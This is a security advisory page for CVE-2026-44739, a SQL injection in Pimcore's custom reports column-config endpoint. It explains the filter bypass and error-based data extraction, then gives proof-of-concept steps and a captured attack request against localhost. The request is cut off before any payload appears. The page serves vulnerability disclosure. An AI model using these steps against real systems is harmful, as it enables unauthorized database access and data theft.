CVE-2026-44739
Summary
The columnConfigAction endpoint in the CustomReportsBundle is vulnerable to SQL injection. An attacker with the reports_config permission can supply a malicious SQL configuration that is concatenated into a query and executed. Although the application attempts to filter certain DDL/DML keywords (like UPDATE, DELETE, DROP), it fails to prevent arbitrary SELECT queries, UNION statements, or the use of dangerous database functions. Furthermore, because the application returns database error messages in the JSON response, an attacker can easily exfiltrate data using error-based SQL injection techniques.
Affected scope
bundles/CustomReportsBundle/src/Controller/Reports/CustomReportController.php
CustomReportController:columnConfigAction -> SqlAdapter::getColumns -> SqlAdapter::buildQueryString -> Db::fetchAssociative()
PoC
- Download and install the version Pimcore <=12.3.3 (latest)
- Login using Admin account or any account that has reports_config permission
- Navigate to custom reports
- Capture the request using burp suite and perform SQLi attack as the following
1. Get Database username
POST /admin/bundle/customreports/custom-report/column-config HTTP/1.1
Host: localhost
Content-Length: 310
sec-ch-ua-platform: "Linux"
Accept-Language: en-US,en;q=0.9
sec-ch-ua: "Not_A Brand";v="99", "Chromium";v="142"
sec-ch-ua-mobile: ?0
X-pimcore-extjs-version-minor: 0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
X-pimcore-csrf-token: 2e42012c8310823bbdbce1598bdecfd19cb5e9c4
X-pimcore-extjs-version-major: 7
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/admin/
Accept-Encoding: gzip, deflate, br
Cookie: pimcore_admin_auth_profile_token=9f990b; PHPSESSID=d101f6fce4d87b8bdbbe800f9f50c82a; _pc_vis=3a17250fba52c657; _pc_ses=177489
⚡ Watch CVE-2026-44739
Get an email if CVE-2026-44739 is added to CISA KEV, gains public exploit code, or a new advisory cites it — max one per day, one-click unsubscribe.
Advisory coverage (1)
External references
Embed the live status
— this badge updates automatically when the KEV or exploit status changes. How to embed it →
[](https://www.csirts.com/cve/CVE-2026-44739)